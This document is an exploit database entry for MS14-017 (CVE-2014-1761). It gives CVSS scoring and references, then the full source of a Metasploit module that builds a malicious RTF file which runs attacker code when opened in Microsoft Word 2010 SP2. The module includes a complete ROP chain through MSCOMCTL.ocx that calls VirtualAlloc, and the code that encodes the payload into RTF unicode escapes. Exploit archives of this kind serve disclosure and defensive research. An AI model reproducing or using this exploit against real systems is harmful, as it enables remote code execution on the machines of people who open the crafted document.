Microsoft Word RTF Object Confusion Exploit (MS14-017)

2014.04.09
Credit: unknown
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => "MS14-017 Microsoft Word RTF Object Confusion", 'Description' => %q{ This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a listoverridecount field can be modified to treat one structure as another. This bug was originally seen being exploited in the wild starting in April 2014. This module was created by reversing a public malware sample. }, 'Author' => [ 'Haifei Li', # vulnerability analysis 'Spencer McIntyre', 'unknown' # malware author ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-1761'], ['MSB', 'MS14-017'], ['URL', 'http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers'], ['URL', 'https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'StackAdjustment' => -3500, 'Space' => 375, 'DisableNops' => true }, 'Targets' => [ # winword.exe v14.0.7116.5000 (SP2) [ 'Microsoft Office 2010 SP2 English on Windows 7 SP1 English', { } ], ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Apr 1 2014')) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.rtf']) ], self.class) end def exploit junk = rand(0xffffffff) rop_chain = [ 0x275de6ae, # ADD ESP,0C # RETN [MSCOMCTL.ocx] junk, junk, 0x27594a2c, # PUSH ECX # POP ESP # AND DWORD PTR [ESI+64],0FFFFFFFB # POP ESI # POP ECX # RETN [MSCOMCTL.ocx] 0x2758b042, # RETN [MSCOMCTL.ocx] 0x2761bdea, # POP EAX # RETN [MSCOMCTL.ocx] 0x275811c8, # ptr to &VirtualAlloc() [IAT MSCOMCTL.ocx] 0x2760ea66, # JMP [EAX] [MSCOMCTL.ocx] 0x275e0081, # POP ECX # RETN [MSCOMCTL.ocx] 0x40000000, 0x00100000, 0x00003000, 0x00000040, 0x00001000, 0x275fbcfc, # PUSH ESP # POP EDI # POP ESI # RETN 8 [MSCOMCTL.ocx] junk, 0x275e0861, # MOV EAX,EDI # POP EDI # POP ESI # RETN [MSCOMCTL.ocx] junk, junk, junk, junk, 0x275ebac1, # XCHG EAX,ESI # NOP # ADD EAX,MSORES+0x13000000 # RETN 4 [MSCOMCTL.ocx] 0x275e0327, # POP EDI # RETN [MSCOMCTL.ocx] junk, 0x40000000, 0x275ceb04, # REP MOVS BYTE [EDI],BYTE [ESI] # XOR EAX,EAX # JMP MSCOMCTL!DllGetClassObject0x3860 [MSCOMCTL.ocx] junk, junk, junk, junk, 0x40000040 ].pack("V*") exploit_data = [ junk ].pack("v") exploit_data << rop_chain exploit_data << payload.encoded exploit_data << make_nops(exploit_data.length % 2) exploit_data = exploit_data.unpack("S<*") exploit_data = exploit_data.map { |word| " ?\\u-#{0x10000 - word}" } exploit_data = exploit_data.join template_part1 = 0x1e04 template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1761.rtf") template_rtf = ::File.open(template_path, 'rb') exploit_rtf = template_rtf.read(template_part1) exploit_rtf << exploit_data exploit_rtf << template_rtf.read file_create(exploit_rtf) end end

References:

http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers
https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top